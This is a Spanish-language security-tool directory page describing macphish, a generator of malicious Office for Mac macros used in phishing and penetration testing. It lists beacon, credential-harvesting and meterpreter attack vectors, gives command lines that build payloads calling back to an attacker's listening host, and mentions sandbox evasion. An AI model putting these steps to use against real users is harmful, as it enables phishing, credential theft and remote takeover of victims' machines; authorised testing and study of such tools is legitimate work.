Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
macphish — Genera macros maliciosas de Office para Mac con baliza, recolección de credenciales y cargas útiles de meterpreter para pruebas de phishing y explotación en macOS. | Kitploit
Herramientas/GitHubGitHub/cldrn/macphish
Generación de PayloadsExplotaciónPhishing
GitHubcldrn/macphish

macphish

Genera macros maliciosas de Office para Mac con baliza, recolección de credenciales y cargas útiles de meterpreter para pruebas de phishing y explotación en macOS.

Ver Repositorio
24550hace 10 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

macphish

Generador de Payloads de Macros para Office en Mac macphish

Vectores de ataque

Hay 4 vectores de ataque disponibles:

  • beacon
  • creds
  • meterpreter
  • meterpreter-grant

Para el método 'creds', macphish puede generar el script de Applescript directamente, en caso de que necesites ejecutarlo desde un shell.

beacon

Al ejecutarse, este payload señalará a nuestro host de escucha y proporcionará información básica del sistema sobre la víctima. La forma más sencilla de generar un payload beacon es:

root@kitploit:~
$./macphish.py -lh <listening host> 

Por defecto, usa curl pero otras utilidades (wget, nslookup) pueden usarse modificando la plantilla de comandos.

creds

root@kitploit:~
$./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter

La forma más sencilla de generar un payload meterpreter es:

root@kitploit:~
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter 

meterpreter-grant

Para generar un payload meterpreter que primero llame a GrantAccessToMultipleFiles():

root@kitploit:~
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant

Para ataques meterpreter, solo se admiten payloads de Python por el momento.

Uso

See https://github.com/cldrn/macphish/wiki/Usage

PoCs

  • Evasión de sandbox usando GrantAccessToMultipleFiles en Word para Mac
  • PoC de permisos globales y recursivos - Macros maliciosas para Word en MacOS
  • Ejecución de Meterpreter en Office para Mac con macros
  • Recolección de credenciales (Phishing) con macros de Word en macOS
Descargar herramienta